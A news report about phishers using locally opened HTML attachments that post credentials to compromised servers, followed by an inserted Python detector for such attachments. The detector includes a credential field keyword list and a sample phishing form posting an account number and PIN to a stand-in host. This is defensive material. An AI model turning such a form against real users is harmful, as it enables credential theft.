
Phishers use HTML attachments to evade browser blacklists

Successful attacks require recipients of phishing e-mails to open an HTML attachment and fill out a form before data is sent to a compromised Web server for harvesting.

Elinor Mills Former Staff Writer
Elinor Mills covers Internet security and privacy. She joined CNET News in 2005 after working as a foreign correspondent for Reuters in Portugal and writing for The Industry Standard, the IDG News Service and the Associated Press.

This screenshot shows an example of a phishing attack that encourages the recipient to download the HTML attachment and provide information. Note the poor grammar, "required informations," which should be a red flag. (Credit: M86)

To get around phishing blacklists in browsers, scammers are luring people by using HTML attachments instead of URLs, a security firm is warning.

Chrome and Firefox are good at detecting phishing sites and warning Web surfers via a browser notice when they are about to visit a site that looks dangerous. So good, in fact, that scammers are resorting to a new tactic to lure victims into their traps via e-mail: attaching HTML files that are stored locally when they are opened, according to an M86 blog post yesterday.

After the user fills in the form with the information the scammers want to steal and clicks "submit," the HTML form sends the data in a POST request to a PHP (Hypertext Preprocessor) script hosted on a legitimate Web server that has been compromised. (POST is the method a browser uses to send data over the Internet to a Web server.) Because few such PHP URLs are reported as abuse, the request does not trigger a warning from the browser, M86 said.

"Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective," the blog post says. "Logically, however, the browser should be able to detect a URL when the browser sends the POST request."

The phishing URLs alone, without the HTML form, are hard to verify because the PHP script runs on the server and no visible HTML is displayed after the submit button is clicked, other than a redirect to a page belonging to the company the scammer was impersonating, the post says.
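The mechanism described in the two paragraphs above (a locally opened HTML file whose form POSTs credentials to a script on a remote, compromised server) is exactly what a mail gateway or attachment scanner can look for. The following is an added example, not code from M86, Google or CNET: it parses an HTML attachment with Python's standard library, collects every form, and flags those that POST to an absolute external URL and contain fields that look like credentials. The sample attachments and the host `example.invalid` are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names that commonly indicate credential or payment-card harvesting.
# The list is an assumption for this example, not a published indicator set.
SENSITIVE_FIELDS = {"password", "passwd", "pin", "ssn", "card", "cvv",
                    "account", "login", "user", "username"}


class FormCollector(HTMLParser):
    """Collect every <form> and the <input> fields nested inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute values may be None for bare attributes
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append({
                "name": (a.get("name") or a.get("id") or "").lower(),
                "type": (a.get("type") or "text").lower(),
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_attachment(html_text):
    """Return a list of suspicious forms: POST, external action, credential fields."""
    parser = FormCollector()
    parser.feed(html_text)
    parser.close()
    findings = []
    for form in parser.forms:
        parsed = urlparse(form["action"])
        # An attachment opened from disk has no legitimate reason to POST to a
        # remote host. Checking netloc also catches protocol-relative "//host/...".
        external = bool(parsed.netloc)
        sensitive = [
            f["name"] for f in form["fields"]
            if f["type"] == "password"
            or any(key in f["name"] for key in SENSITIVE_FIELDS)
        ]
        if form["method"] == "post" and external and sensitive:
            findings.append({
                "action": form["action"],
                "host": parsed.netloc,
                "fields": sensitive,
            })
    return findings


# Constructed sample: mimics the attachment in the article, down to the grammar.
SAMPLE_ATTACHMENT = """
<html><body>
<h1>Please verify your required informations</h1>
<form method="POST" action="http://example.invalid/images/verify.php">
  <input type="text" name="account_number">
  <input type="password" name="pin">
  <input type="submit" value="Submit">
</form>
</body></html>
"""

# Constructed benign sample: a GET search form with a relative action.
BENIGN_ATTACHMENT = """
<html><body>
<form method="get" action="/search"><input type="text" name="q"></form>
</body></html>
"""

if __name__ == "__main__":
    for finding in analyze_attachment(SAMPLE_ATTACHMENT):
        print("suspicious form posting to", finding["host"],
              "with fields", ", ".join(finding["fields"]))
    print("benign findings:", analyze_attachment(BENIGN_ATTACHMENT))
```

The check is deliberately narrow: it flags the combination the article describes (POST, remote host, credential-shaped fields) rather than any form, so a locally referenced or GET-only form is not reported. It does not follow JavaScript or `meta refresh` redirects, so a scanner built on it should treat those as separate signals; the external host it extracts is what you would feed to reputation lookups or to the browser-side URL checks the M86 post says should apply to POST destinations.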

To protect against this, people should avoid opening HTML attachments if the e-mail seems suspicious and should not provide any information in such forms. Financial institutions do not send such attachments to customers.

While many people will click on a link in an e-mail that looks like it comes from their bank, fewer are likely to open the HTML attachment.

Mozilla representatives did not provide comment on the report today. Meanwhile, a Google spokesperson provided this comment: "Google has a number of defenses against phishing sites to help protect our users. For example, Gmail checks HTML attachments for phishing sites and displays a warning to users when one is detected. We always encourage users to be cautious when handling unexpected attachments and when providing personal information requested by email."